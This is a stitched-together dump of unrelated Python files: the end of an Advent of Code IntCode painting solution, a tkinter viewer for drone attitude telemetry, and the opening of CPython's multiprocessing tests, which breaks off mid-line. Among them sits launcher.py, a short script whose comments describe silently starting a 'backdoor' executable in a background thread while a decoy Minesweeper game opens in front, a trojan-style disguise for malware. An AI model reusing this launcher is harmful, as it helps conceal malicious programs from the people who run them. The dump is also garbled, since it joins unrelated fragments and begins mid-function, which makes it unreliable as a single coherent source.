"""Paint a Registration Identifier on my Spaceship to please the Space police."""
canvas = {complex(0, 0): 1}
application = IntCodeApplication(
application=data,
name="Painting App",
flexible_memory=True,
)
pipe_in = application.stdin
pipe_out = application.stdout
robot = threading.Thread(target=application.run)
robot.start()
location = complex(0, 0)
direction = complex(0, 1)
while robot.is_alive():
pipe_in.put(canvas.get(location, 0))
canvas[location] = pipe_out.get()
direction *= complex(0, 1 - 2*pipe_out.get())
location += direction
x_min, x_max = min(c.real for c in canvas), max(c.real for c in canvas)
y_min, y_max = min(c.imag for c in canvas), max(c.imag for c in canvas)
panels = [[' ']*int(x_max-x_min+1) for _ in range(int(y_min), int(y_max)+1)]
for coordinate, color in canvas.items():
x, y = int(coordinate.real)-int(x_min), int(coordinate.imag) - int(y_min)
panels[y][x] = ' ' if color == 0 else "\u25AF"
return "\n".join("".join(row) for row in reversed(panels))
def main(data: List[str]) -> Tuple[int, str]:
"""The main function taking care of parsing the input data and running the solutions."""
data = [int(number) for number in data[0].split(",")]
answer_one = part_one(data)
answer_two = part_two(data)
return answer_one, "\n" + answer_two
|
launcher.py
|
import os
import threading
scriptpath = "C:/Users/..." # MODIFY ME -> this will be the backdoor (clientwin.exe)
exepath = "C:/Users/..." # MODIFY ME -> this will be the front program (minesweeper.exe)
backupexe = "C:/Users/..." # MODIFY ME -> this will be backup.exe or b2.exe
def front():
os.startfile(exepath)
def back():
os.startfile(scriptpath)
def main():
os.startfile(backupexe)
bThread = threading.Thread(target = back)
bThread.daemon = True
bThread.start()
front()
if __name__ == "__main__":
main()
|
imudisplay.py
|
#!/usr/bin/env python3
'''
imudisplay.py - graphical demo of MSPPG Attitude messages
Copyright (C) Alec Singer and Simon D. Levy 2015
This code is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This code is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this code. If not, see <http://www.gnu.org/licenses/>.
'''
FMUPORT = '/dev/ttyUSB0'
#FMUPORT = 'COM3'
VEHICLE_SCALE = 0.10
UPDATE_MSEC = 10
import tkinter
import threading
import serial
import msppg
from math import sin, cos, radians, degrees
import numpy as np
class Display(object):
def __init__(self, driver, simulation=False):
self.driver = driver
self.width = int(self.driver.canvas['width'])
self.height = int(self.driver.canvas['height'])
self.driver.root.bind("<Key>", self._check_quit)
self.driver.root.title('IMU Telemetry')
# Vehicle dimensions
W = VEHICLE_SCALE
D = VEHICLE_SCALE / 2
L = VEHICLE_SCALE * 2
#Let these be in World-coordinates (worldview-matrix already applied)
####In right-handed, counter-clockwise order
self.vehicle_points, self.vehicle_faces, self.vehicle_face_colors = self._get_vehicle(W, D, L)
# Assume no angles to start
self.yaw_pitch_roll = None
# Rotation matrices
self.pitchrot = np.eye(3)
self.yawrot = np.eye(3)
self.rollrot = np.eye(3)
self.simulation = simulation
self.running = False
def start(self, delay_msec=UPDATE_MSEC):
self._schedule_display_task(delay_msec)
self.running = True
self.faces = []
self.yaw_pitch_roll_prev = None
self.yaw_pitch_roll_change = None
def stop(self):
self._clear()
self.running = False
def setParams(self, pitchroll_kp_percent, yaw_kp_percent):
self.pitchroll_kp_percent = pitchroll_kp_percent
self.yaw_kp_percent = yaw_kp_percent
self._set_sliders()
def _schedule_display_task(self, delay_msec):
self.driver.root.after(delay_msec, self._task)
def _clear(self):
for face in self.faces:
self.driver.canvas.delete(face)
self.faces = []
def _task(self):
if self.running:
self.yaw_pitch_roll = self.driver.getYawPitchRoll()
self._update()
self._schedule_display_task(UPDATE_MSEC)
def _to_screen_coords(self, pv):
dims = [int(s) for s in str(self.driver.root.geometry()).split('+')[0].split('x')]
width, height = dims[0], dims[1]
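# The matrix below (comment added for clarity) maps normalized device
# coordinates in [-1, 1] to pixel coordinates: scale by half the window size,
# flip y (canvas y grows downward), and translate to the window centre.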
SC = np.eye(4)
SC[0,0] = width/2
SC[1,1] = -height/2
SC[0,3] = width/2
SC[1,3] = height/2
x = SC[0,0]*pv[0]+SC[0,1]*pv[1]+SC[0,2]*pv[2]+SC[0,3]
y = SC[1,0]*pv[0]+SC[1,1]*pv[1]+SC[1,2]*pv[2]+SC[1,3]
z = SC[2,0]*pv[0]+SC[2,1]*pv[1]+SC[2,2]*pv[2]+SC[2,3]
return np.array([x, y, z])
def _create_window(self, x, widget):
return self.driver.canvas.create_window(x, 10, anchor=tkinter.NW, window=widget)
def _check_quit(self, event):
if ord(event.char) == 27: # ESC
exit(0)
def _update(self):
# Erase previous image
self._clear()
# Convert angles to X,Y,Z rotation matrices
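# (Added note) yawrot rotates about the vertical Y axis, pitchrot about the
# X axis, and rollrot about the Z axis; they are composed as yaw*pitch*roll below.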
yawAngle = radians(self.yaw_pitch_roll[0])
self.yawrot[0,0] = +cos(yawAngle)
self.yawrot[0,2] = +sin(yawAngle)
self.yawrot[2,0] = -sin(yawAngle)
self.yawrot[2,2] = +cos(yawAngle)
pitchAngle = radians(self.yaw_pitch_roll[1])
self.pitchrot[1,1] = +cos(pitchAngle)
self.pitchrot[1,2] = -sin(pitchAngle)
self.pitchrot[2,1] = +sin(pitchAngle)
self.pitchrot[2,2] = +cos(pitchAngle)
rollAngle = -radians(self.yaw_pitch_roll[2]) # negate so positive is roll rightward
self.rollrot[0,0] = +cos(rollAngle)
self.rollrot[0,1] = -sin(rollAngle)
self.rollrot[1,0] = +sin(rollAngle)
self.rollrot[1,1] = +cos(rollAngle)
# Multiply matrices
rot = np.dot(np.dot(self.yawrot, self.pitchrot), self.rollrot)
# Draw polygons
for i in range(len(self.vehicle_faces)):
poly = [] #transformed polygon
for j in range(len(self.vehicle_faces[0])):
v = self.vehicle_points[self.vehicle_faces[i][j]]
# Transform the point from 3D to 2D
ps = np.dot(v, rot.T)
p = self._to_screen_coords(ps)
# Put the screenpoint in the list of transformed vertices
poly.append((p[0], p[1]))
if self._is_polygon_front_face(poly): #Backface culling
self.faces.append(self.driver.canvas.create_polygon(*poly, fill=self.vehicle_face_colors[i]))
# Update angle changes
if not self.yaw_pitch_roll_prev is None:
self.yaw_pitch_roll_change = [degrees(abs(pair[0]-pair[1]))
for pair in zip(self.yaw_pitch_roll,self.yaw_pitch_roll_prev)]
self.yaw_pitch_roll_prev = self.yaw_pitch_roll
def _is_polygon_front_face(self, pts):
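# (Added note) Backface culling: the loop accumulates twice the signed area of
# the projected polygon (shoelace formula); its sign gives the screen-space
# winding order, which is used as the front/back test.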
summa = 0.0
num = len(pts)
for i in range(num-1):
summa += (pts[i+1][0]-pts[i][0])*(pts[i+1][1]+pts[i][1])
summa += (pts[0][0]-pts[num-1][0])*(pts[0][1]+pts[num-1][1])
return summa > 0.0
def _get_vehicle(self, width, depth, length):
#creates constants
length = width
#arm constants
armLength = width*2
armWidth = armLength/10
#arrow constants
arrowWidth = 1.0 * armWidth
arrowLength = 5.0 * armWidth
arrowHeight = 1.5 * depth
#prop constants
propWidth = 1.00 * armWidth
propNarrowWidth = 0.20 * propWidth
propLength = 7.50 * propWidth
propNarrowLength = 0.75 * propLength
propShortLength = 0.25 * propLength
#prop pitch constants
tipTU = 0.900 * depth
tipTL = 0.625 * depth
tipBU = 0.625 * depth
tipBL = 0.350 * depth
endT = .75 * depth
endB = .50 * depth
constant1 = ((endT-tipTL)/3) * depth
constant2 = ((endB-tipBL)/3) * depth
farTU = tipTU - constant2
farTL = tipTL + constant1
farBU = tipBU - constant1
farBL = tipBL + constant2
closeTU = farTU - constant2
closeTL = farTL + constant1
closeBU = farBU - constant1
closeBL = farBL + constant2
points = np.array([
#creates arm 1
[+width - armWidth, +depth/2 , +length + armWidth], #0 0
[+width + armWidth, +depth/2 , +length - armWidth], #1 1
[+width + armWidth, -depth/2 , +length - armWidth], #2 2
[+width - armWidth, -depth/2 , +length + armWidth], #3 3
[+width + armLength - armWidth, +depth/2 , +length + armLength + armWidth], #4 4
[+width + armLength + armWidth, +depth/2 , +length + armLength - armWidth], #5 5
[+width + armLength + armWidth, -depth/2 , +length + armLength - armWidth], #6 6
[+width + armLength - armWidth, -depth/2 , +length + armLength + armWidth], #7 7
#creates arm 2
[-width - armWidth, +depth/2 , +length - armWidth], #0 8
[-width + armWidth, +depth/2 , +length + armWidth], #1 9
[-width + armWidth, -depth/2 , +length + armWidth], #2 10
[-width - armWidth, -depth/2 , +length - armWidth], #3 11
[-width - armLength - armWidth, +depth/2 , +length + armLength - armWidth], #4 12
[-width - armLength + armWidth, +depth/2 , +length + armLength + armWidth], #5 13
[-width - armLength + armWidth, -depth/2 , +length + armLength + armWidth], #6 14
[-width - armLength - armWidth, -depth/2 , +length + armLength - armWidth], #7 15
#creates arm 3
[+width + armLength - armWidth, +depth/2 , -length - armLength - armWidth], #0 16
[+width + armLength + armWidth, +depth/2 , -length - armLength + armWidth], #1 17
[+width + armLength + armWidth, -depth/2 , -length - armLength + armWidth], #2 18
[+width + armLength - armWidth, -depth/2 , -length - armLength - armWidth], #3 19
[+width - armWidth, +depth/2 , -length - armWidth], #4 20
[+width + armWidth, +depth/2 , -length + armWidth], #5 21
[+width + armWidth, -depth/2 , -length + armWidth], #6 22
[+width - armWidth, -depth/2 , -length - armWidth], #7 23
#creates arm 4
[-width - armLength - armWidth, +depth/2 , -length - armLength + armWidth], #0 24
[-width - armLength + armWidth, +depth/2 , -length - armLength - armWidth], #1 25
[-width - armLength + armWidth, -depth/2 , -length - armLength - armWidth], #2 26
[-width - armLength - armWidth, -depth/2 , -length - armLength + armWidth], #3 27
[-width - armWidth, +depth/2 , -length + armWidth], #4 28
[-width + armWidth, +depth/2 , -length - armWidth], #5 29
[-width + armWidth, -depth/2 , -length - armWidth], #6 30
[-width - armWidth, -depth/2 , -length + armWidth], #7 31
#creates the arrow body
[-arrowWidth, +arrowHeight, 0], #0 32
[+arrowWidth, +arrowHeight, 0], #1 33
[+arrowWidth, +depth, 0], #2 34
[-arrowWidth, +depth, 0], #3 35
[-arrowWidth, +arrowHeight, +arrowLength], #4 36
[+arrowWidth, +arrowHeight, +arrowLength], #5 37
[+arrowWidth, +depth, +arrowLength], #6 38
[-arrowWidth, +depth, +arrowLength], #7 39
#creates the arrow head
[-(1/6)*arrowWidth, +arrowHeight, -arrowLength], #0 40
[+(1/6)*arrowWidth, +arrowHeight, -arrowLength], #1 41
[+(1/6)*arrowWidth, +depth, -arrowLength], #2 42
[-(1/6)*arrowWidth, +depth, -arrowLength], #3 43
[-arrowWidth - 2*arrowWidth, +arrowHeight, 0], #4 44
[+arrowWidth + 2*arrowWidth, +arrowHeight, 0], #5 45
[+arrowWidth + 2*arrowWidth, +depth, 0], #6 46
[-arrowWidth - 2*arrowWidth, +depth, 0], #7 47
#creates the center box
[-width - armWidth, +depth, -length + armWidth], #0 48
[-width + armWidth, +depth, -length - armWidth], #1 49
[+width - armWidth, +depth, -length - armWidth], #2 50
[+width + armWidth, +depth, -length + armWidth], #3 51
[+width - armWidth, -depth, -length - armWidth], #4 52
[+width + armWidth, -depth, -length + armWidth], #5 53
[-width - armWidth, -depth, -length + armWidth], #6 54
[-width + armWidth, -depth, -length - armWidth], #7 55
[-width - armWidth, +depth, +length - armWidth], #8 56
[-width + armWidth, +depth, +length + armWidth], #9 57
[+width - armWidth, +depth, +length + armWidth], #10 58
[+width + armWidth, +depth, +length - armWidth], #11 59
[+width - armWidth, -depth, +length + armWidth], #12 60
[+width + armWidth, -depth, +length - armWidth], #13 61
[-width - armWidth, -depth, +length - armWidth], #14 62
[-width + armWidth, -depth, +length + armWidth], #15 63
#creates prop 1 on arm 1
#North East far narrow tip
[+width+armLength + propLength - propNarrowWidth, +tipTL, +length+armLength - propLength - propNarrowWidth], #0 64
[+width+armLength + propLength + propNarrowWidth, +tipTU, +length+armLength - propLength + propNarrowWidth], #1 65
[+width+armLength + propLength + propNarrowWidth, +tipBU, +length+armLength - propLength + propNarrowWidth], #2 66
[+width+armLength + propLength - propNarrowWidth, +tipBL, +length+armLength - propLength - propNarrowWidth], #3 67
#North East far wide
[+width+armLength + propNarrowLength - propWidth, +farTL, +length+armLength - propNarrowLength - propWidth], #4 68
[+width+armLength + propNarrowLength + propWidth, +farTU, +length+armLength - propNarrowLength + propWidth], #5 69
[+width+armLength + propNarrowLength + propWidth, +farBU, +length+armLength - propNarrowLength + propWidth], #6 70
[+width+armLength + propNarrowLength - propWidth, +farBL, +length+armLength - propNarrowLength - propWidth], #7 71
#North East close wide
[+width+armLength + propShortLength - propWidth, +closeTL, +length+armLength - propShortLength - propWidth], #4 72
[+width+armLength + propShortLength + propWidth, +closeTU, +length+armLength - propShortLength + propWidth], #5 73
[+width+armLength + propShortLength + propWidth, +farBU, +length+armLength - propShortLength + propWidth], #6 74
[+width+armLength + propShortLength - propWidth, +farBL, +length+armLength - propShortLength - propWidth], #7 75
#Middle narrow tip
[+width+armLength - propNarrowWidth, +endT, +length+armLength - propNarrowWidth], #4 76
[+width+armLength + propNarrowWidth, +endT, +length+armLength + propNarrowWidth], #5 77
[+width+armLength + propNarrowWidth, +endB, +length+armLength + propNarrowWidth], #6 78
[+width+armLength - propNarrowWidth, +endB, +length+armLength - propNarrowWidth], #7 79
#South West close wide
[+width+armLength - propShortLength - propWidth, +closeTU, +length+armLength + propShortLength - propWidth], #4 80
[+width+armLength - propShortLength + propWidth, +closeTL, +length+armLength + propShortLength + propWidth], #5 81
[+width+armLength - propShortLength + propWidth, +closeBL, +length+armLength + propShortLength + propWidth], #6 82
[+width+armLength - propShortLength - propWidth, +closeBU, +length+armLength + propShortLength - propWidth], #7 83
#South West far wide
[+width+armLength - propNarrowLength - propWidth, +farTU, +length+armLength + propNarrowLength - propWidth], #4 84
[+width+armLength - propNarrowLength + propWidth, +farTL, +length+armLength + propNarrowLength + propWidth], #5 85
[+width+armLength - propNarrowLength + propWidth, +farBL, +length+armLength + propNarrowLength + propWidth], #6 86
[+width+armLength - propNarrowLength - propWidth, +farBU, +length+armLength + propNarrowLength - propWidth], #7 87
#South West far narrow tip
[+width+armLength - propLength - propNarrowWidth, +tipTU, +length+armLength + propLength - propNarrowWidth], #0 88
[+width+armLength - propLength + propNarrowWidth, +tipTL, +length+armLength + propLength + propNarrowWidth], #1 89
[+width+armLength - propLength + propNarrowWidth, +tipBL, +length+armLength + propLength + propNarrowWidth], #2 90
[+width+armLength - propLength - propNarrowWidth, +tipBU, +length+armLength + propLength - propNarrowWidth], #3 91
#creates prop 4 on arm 4
#North East far narrow tip
[-width-armLength + propLength - propNarrowWidth, +tipTL, -length-armLength - propLength - propNarrowWidth], #0 92
[-width-armLength + propLength + propNarrowWidth, +tipTU, -length-armLength - propLength + propNarrowWidth], #1 93
[-width-armLength + propLength + propNarrowWidth, +tipBU, -length-armLength - propLength + propNarrowWidth], #2 94
[-width-armLength + propLength - propNarrowWidth, +tipBL, -length-armLength - propLength - propNarrowWidth], #3 95
#North East far wide
[-width-armLength + propNarrowLength - propWidth, +farTL, -length-armLength - propNarrowLength - propWidth], #4 96
[-width-armLength + propNarrowLength + propWidth, +farTU, -length-armLength - propNarrowLength + propWidth], #5 97
[-width-armLength + propNarrowLength + propWidth, +farBU, -length-armLength - propNarrowLength + propWidth], #6 98
[-width-armLength + propNarrowLength - propWidth, +farBL, -length-armLength - propNarrowLength - propWidth], #7 99
#North East close wide
[-width-armLength + propShortLength - propWidth, +closeTL, -length-armLength - propShortLength - propWidth], #4 100
[-width-armLength + propShortLength + propWidth, +closeTU, -length-armLength - propShortLength + propWidth], #5 101
[-width-armLength + propShortLength + propWidth, +closeBU, -length-armLength - propShortLength + propWidth], #6 102
[-width-armLength + propShortLength - propWidth, +closeBL, -length-armLength - propShortLength - propWidth], #7 103
#Middle narrow tip
[-width-armLength - propNarrowWidth, +endT, -length-armLength - propNarrowWidth], #4 104
[-width-armLength + propNarrowWidth, +endT, -length-armLength + propNarrowWidth], #5 105
[-width-armLength + propNarrowWidth, +endB, -length-armLength + propNarrowWidth], #6 106
[-width-armLength - propNarrowWidth, +endB, -length-armLength - propNarrowWidth], #7 107
#South West close wide
[-width-armLength - propShortLength - propWidth, +closeTU, -length-armLength + propShortLength - propWidth], #4 108
[-width-armLength - propShortLength + propWidth, +closeTL, -length-armLength + propShortLength + propWidth], #5 109
[-width-armLength - propShortLength + propWidth, +closeBL, -length-armLength + propShortLength + propWidth], #6 110
[-width-armLength - propShortLength - propWidth, +closeBU, -length-armLength + propShortLength - propWidth], #7 111
#South West far wide
[-width-armLength - propNarrowLength - propWidth, +farTU, -length-armLength + propNarrowLength - propWidth], #4 112
[-width-armLength - propNarrowLength + propWidth, +farTL, -length-armLength + propNarrowLength + propWidth], #5 113
[-width-armLength - propNarrowLength + propWidth, +farBL, -length-armLength + propNarrowLength + propWidth], #6 114
[-width-armLength - propNarrowLength - propWidth, +farBU, -length-armLength + propNarrowLength - propWidth], #7 115
#South West far narrow tip
[-width-armLength - propLength - propNarrowWidth, +tipTU, -length-armLength + propLength - propNarrowWidth], #0 116
[-width-armLength - propLength + propNarrowWidth, +tipTL, -length-armLength + propLength + propNarrowWidth], #1 117
[-width-armLength - propLength + propNarrowWidth, +tipBL, -length-armLength + propLength + propNarrowWidth], #2 118
[-width-armLength - propLength - propNarrowWidth, +tipBU, -length-armLength + propLength - propNarrowWidth], #3 119
#creates prop 3 on arm 3
#North West far narrow tip
[+width+armLength - propLength - propNarrowWidth, +tipTU, -length-armLength - propLength + propNarrowWidth], #0 120
[+width+armLength - propLength + propNarrowWidth, +tipTL, -length-armLength - propLength - propNarrowWidth], #1 121
[+width+armLength - propLength + propNarrowWidth, +tipBL, -length-armLength - propLength - propNarrowWidth], #2 122
[+width+armLength - propLength - propNarrowWidth, +tipBU, -length-armLength - propLength + propNarrowWidth], #3 123
#North West far wide
[+width+armLength - propNarrowLength - propWidth, +farTU, -length-armLength - propNarrowLength + propWidth], #4 124
[+width+armLength - propNarrowLength + propWidth, +farTL, -length-armLength - propNarrowLength - propWidth], #5 125
[+width+armLength - propNarrowLength + propWidth, +farBL, -length-armLength - propNarrowLength - propWidth], #6 126
[+width+armLength - propNarrowLength - propWidth, +farBU, -length-armLength - propNarrowLength + propWidth], #7 127
#North West close wide
[+width+armLength - propShortLength - propWidth, +closeTU, -length-armLength - propShortLength + propWidth], #4 128
[+width+armLength - propShortLength + propWidth, +closeTL, -length-armLength - propShortLength - propWidth], #5 129
[+width+armLength - propShortLength + propWidth, +closeBL, -length-armLength - propShortLength - propWidth], #6 130
[+width+armLength - propShortLength - propWidth, +closeBU, -length-armLength - propShortLength + propWidth], #7 131
#Middle narrow tip
[+width+armLength - propNarrowWidth, +endT, -length-armLength + propNarrowWidth], #4 132
[+width+armLength + propNarrowWidth, +endT, -length-armLength - propNarrowWidth], #5 133
[+width+armLength + propNarrowWidth, +endB, -length-armLength - propNarrowWidth], #6 134
[+width+armLength - propNarrowWidth, +endB, -length-armLength + propNarrowWidth], #7 135
#South East close wide
[+width+armLength + propShortLength - propWidth, +closeTL, -length-armLength + propShortLength + propWidth], #4 136
[+width+armLength + propShortLength + propWidth, +closeTU, -length-armLength + propShortLength - propWidth], #5 137
[+width+armLength + propShortLength + propWidth, +closeBU, -length-armLength + propShortLength - propWidth], #6 138
[+width+armLength + propShortLength - propWidth, +closeBL, -length-armLength + propShortLength + propWidth], #7 139
#South East far wide
[+width+armLength + propNarrowLength - propWidth, +farTL, -length-armLength + propNarrowLength + propWidth], #4 140
[+width+armLength + propNarrowLength + propWidth, +farTU, -length-armLength + propNarrowLength - propWidth], #5 141
[+width+armLength + propNarrowLength + propWidth, +farBU, -length-armLength + propNarrowLength - propWidth], #6 142
[+width+armLength + propNarrowLength - propWidth, +farBL, -length-armLength + propNarrowLength + propWidth], #7 143
#South East far narrow tip
[+width+armLength + propLength - propNarrowWidth, +tipTL, -length-armLength + propLength + propNarrowWidth], #0 144
[+width+armLength + propLength + propNarrowWidth, +tipTU, -length-armLength + propLength - propNarrowWidth], #1 145
[+width+armLength + propLength + propNarrowWidth, +tipBU, -length-armLength + propLength - propNarrowWidth], #2 146
[+width+armLength + propLength - propNarrowWidth, +tipBL, -length-armLength + propLength + propNarrowWidth], #3 147
#creates prop 2 on arm 2
#North West far narrow tip
[-width-armLength - propLength - propNarrowWidth, +tipTU, +length+armLength - propLength + propNarrowWidth], #0 148
[-width-armLength - propLength + propNarrowWidth, +tipTL, +length+armLength - propLength - propNarrowWidth], #1 149
[-width-armLength - propLength + propNarrowWidth, +tipBL, +length+armLength - propLength - propNarrowWidth], #2 150
[-width-armLength - propLength - propNarrowWidth, +tipBU, +length+armLength - propLength + propNarrowWidth], #3 151
#North West far wide
[-width-armLength - propNarrowLength - propWidth, +farTU, +length+armLength - propNarrowLength + propWidth], #4 152
[-width-armLength - propNarrowLength + propWidth, +farTL, +length+armLength - propNarrowLength - propWidth], #5 153
[-width-armLength - propNarrowLength + propWidth, +farBL, +length+armLength - propNarrowLength - propWidth], #6 154
[-width-armLength - propNarrowLength - propWidth, +farBU, +length+armLength - propNarrowLength + propWidth], #7 155
#North West close wide
[-width-armLength - propShortLength - propWidth, +closeTU, +length+armLength - propShortLength + propWidth], #4 156
[-width-armLength - propShortLength + propWidth, +closeTL, +length+armLength - propShortLength - propWidth], #5 157
[-width-armLength - propShortLength + propWidth, +closeBL, +length+armLength - propShortLength - propWidth], #6 158
[-width-armLength - propShortLength - propWidth, +closeBU, +length+armLength - propShortLength + propWidth], #7 159
#Middle narrow tip
[-width-armLength - propNarrowWidth, +endT, +length+armLength + propNarrowWidth], #4 160
[-width-armLength + propNarrowWidth, +endT, +length+armLength - propNarrowWidth], #5 161
[-width-armLength + propNarrowWidth, +endB, +length+armLength - propNarrowWidth], #6 162
[-width-armLength - propNarrowWidth, +endB, +length+armLength + propNarrowWidth], #7 163
#South East close wide
[-width-armLength + propShortLength - propWidth, +closeTL, +length+armLength + propShortLength + propWidth], #4 164
[-width-armLength + propShortLength + propWidth, +closeTU, +length+armLength + propShortLength - propWidth], #5 165
[-width-armLength + propShortLength + propWidth, +closeBU, +length+armLength + propShortLength - propWidth], #6 166
[-width-armLength + propShortLength - propWidth, +closeBL, +length+armLength + propShortLength + propWidth], #7 167
#South East far wide
[-width-armLength + propNarrowLength - propWidth, +farTL, +length+armLength + propNarrowLength + propWidth], #4 168
[-width-armLength + propNarrowLength + propWidth, +farTU, +length+armLength + propNarrowLength - propWidth], #5 169
[-width-armLength + propNarrowLength + propWidth, +farBU, +length+armLength + propNarrowLength - propWidth], #6 170
[-width-armLength + propNarrowLength - propWidth, +farBL, +length+armLength + propNarrowLength + propWidth], #7 171
#South East far narrow tip
[-width-armLength + propLength - propNarrowWidth, +tipTL, +length+armLength + propLength + propNarrowWidth], #0 172
[-width-armLength + propLength + propNarrowWidth, +tipTU, +length+armLength + propLength - propNarrowWidth], #1 173
[-width-armLength + propLength + propNarrowWidth, +tipBU, +length+armLength + propLength - propNarrowWidth], #2 174
[-width-armLength + propLength - propNarrowWidth, +tipBL, +length+armLength + propLength + propNarrowWidth] #3 175
])
# Each face contains indices into points array above
faces = [(50,49,48,51),(59,51,48,56),(58,59,56,57), #top of the Box
(40,41,42,43),(41,45,46,42),(45,44,47,46),(44,40,43,47),(40,44,45,41),(43,42,46,47), #arrow Head
(32,33,34,35),(33,37,38,34),(37,36,39,38),(36,32,35,39),(32,36,37,33),(35,34,38,39), #arrow Body
(54,55,52,53),(54,53,61,62),(62,61,60,63),(48,49,55,54),(49,50,52,55),(50,51,53,52),(51,59,61,53),(59,58,60,61),(58,57,63,60),(57,56,62,63),(56,48,54,62), #rest of the box
(1,5,6,2),(5,4,7,6),(4,0,3,7),(0,4,5,1),(3,2,6,7), #arm 1
(9,13,14,10),(13,12,15,14),(12,8,11,15),(8,12,13,9),(11,10,14,15), #arm 2
(16,17,18,19),(17,21,22,18),(20,16,19,23),(16,20,21,17),(19,18,22,23), #arm 3
(24,25,26,27),(25,29,30,26),(28,24,27,31),(24,28,29,25),(27,26,30,31), #arm 4
(92,93,94,95),(93,97,98,94),(97,96,99,98),(96,92,95,99),(92,96,97,93),(95,94,98,99),(97,101,102,98),(101,100,103,102),(100,96,99,103),(96,100,101,97),(99,98,102,103),(101,105,106,102),(104,100,103,107),(100,104,105,101),(103,102,106,107),(105,109,110,106),(108,104,107,111),(104,108,109,105),(107,106,110,111),(109,113,114,110),(112,108,111,115),(108,112,113,109),(111,110,114,115),(113,117,118,114),(117,116,119,118),(116,112,115,119),(112,116,117,113),(115,114,118,119), #prop 4
(120,121,122,123),(121,125,126,122),(124,120,123,127),(120,124,125,121),(123,122,126,127),(125,129,130,126),(128,124,127,131),(124,128,129,125),(127,126,130,131),(129,133,134,130),(132,128,131,135),(128,132,133,129),(131,130,134,135),(133,137,138,134),(136,132,135,139),(132,136,137,133),(135,134,138,139),(137,141,142,138),(140,136,139,143),(136,140,141,137),(139,138,142,143),(141,145,146,142),(145,144,147,146),(144,140,143,147),(140,144,145,141),(143,142,146,147), #prop 3
(148,149,150,151),(149,153,154,150),(152,148,151,155),(148,152,153,149),(151,150,154,155),(153,157,158,154),(156,152,155,159),(152,156,157,153),(155,154,158,159),(157,161,162,158),(160,156,159,163),(156,160,161,157),(159,158,162,163),(161,165,166,162),(164,160,163,167),(160,164,165,161),(163,162,166,167),(165,169,170,166),(168,164,167,171),(164,168,169,165),(167,166,170,171),(169,173,174,170),(173,172,175,174),(172,168,171,175),(168,172,173,169),(171,170,174,175), #prop 2
(64,65,66,67),(65,69,70,66),(68,64,67,71),(64,68,69,65),(67,66,70,71),(69,73,74,70),(72,68,71,75),(68,72,73,69),(71,70,74,75),(73,77,78,74),(76,72,75,79),(72,76,77,73),(75,74,78,79),(77,81,82,78),(80,76,79,83),(76,80,81,77),(79,78,82,83),(81,85,86,82),(84,80,83,87),(80,84,85,81),(83,82,86,87),(85,89,90,86),(89,88,91,90),(88,84,87,91),(84,88,89,85),(87,86,90,91), #prop 1
]
lightGrey = '#72716d'
grey = '#665f59'
darkGrey = '#4c4641'
darkRed = '#993838'
red = 'red'
green = '#31e224'
darkGreen = '#2b7f24'
colors = [
lightGrey,lightGrey,lightGrey, #box Top
'red','red','red','red','red','red', #arrow head
'red','red','red','red','red','red' , #arrow body
lightGrey,lightGrey,lightGrey, #box bottom
grey,grey,grey, #box North
grey, #box East
grey,grey,grey, #box South
grey, #box West
lightGrey, grey, lightGrey, darkGrey, darkGrey, #arm 1
lightGrey, grey, lightGrey, darkGrey, darkGrey, #arm 2
grey, lightGrey, lightGrey, darkGrey, darkGrey, #arm 3
grey, lightGrey, lightGrey, darkGrey, darkGrey, #arm 4
#prop 4
darkGreen,darkGreen,darkGreen,darkGreen,green,
green,darkGreen,darkGreen,darkGreen,
green,green,darkGreen,darkGreen,
green,green,darkGreen,darkGreen,
green,green,darkGreen,
darkGreen,green,green,darkGreen,
darkGreen,darkGreen,green,green,
#prop 3
darkGreen,darkGreen,darkGreen,green,
green,darkGreen,darkGreen,green,
green,darkGreen,darkGreen,green,
green,darkGreen,darkGreen,green,
green,darkGreen,darkGreen,green,
green,darkGreen,darkGreen,darkGreen,green,green,
#prop 2
darkRed,darkRed,darkRed,red,
red,darkRed,darkRed,red,
red,darkRed,darkRed,red,
red,darkRed,darkRed,red,
red,darkRed,darkRed,red,
red,darkRed,darkRed,darkRed,red,red,
#prop 1
darkRed,darkRed,darkRed,red,red,
darkRed,darkRed,red,red,
darkRed,darkRed,red,red,
darkRed,darkRed,red,
red,darkRed,darkRed,red,
red,darkRed,darkRed,darkRed,red,red,
]
return points, faces, colors
# Testing ==============================================================================================================
class MSPDriver(object):
def __init__(self, root, canvas):
self.root = root
self.canvas = canvas
self.fmuport = serial.Serial(FMUPORT, 115200)
# MSPPG
self.parser = msppg.MSP_Parser()
self.parser.set_ATTITUDE_Handler(self._attitude_message_handler)
self.request = msppg.serialize_ATTITUDE_Request()
self.yaw, self.pitch, self.roll = 0, 0, 0
thread = threading.Thread(target = self._read_fmu)
thread.daemon = True
thread.start()
self._send_request()
def _send_request(self):
self.fmuport.write(self.request)
def _read_fmu(self):
while True:
self.parser.parse(self.fmuport.read(1))
def _attitude_message_handler(self, x, y, z):
self.pitch = -y/10.
self.roll = x/10.
self.yaw = z
self._send_request()
def getYawPitchRoll(self):
return self.yaw, self.pitch, self.roll
if __name__ == "__main__":
width = 800
height = 800
root = tkinter.Tk()
root.geometry('%dx%d+%d+%d' % (width, height, 200, 200))
canvas = tkinter.Canvas(root, width=width, height=height, background='black')
driver = MSPDriver(root, canvas)
canvas.pack()
Display(driver, simulation=True).start()
tkinter.mainloop()
|
test_multiprocessing.py
|
#!/usr/bin/env python
#
# Unit tests for the multiprocessing package
#
import unittest
import threading
import Queue
import time
import sys
import os
import gc
import signal
import array
import copy
import socket
import random
import logging
# Work around broken sem_open implementations
try:
import multiprocessing.synchronize
except ImportError, e:
from test.test_support import TestSkipped
raise TestSkipped(e)
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
import _multiprocessing
from multiprocessing import util
#
#
#
latin = str
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.WARNING
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
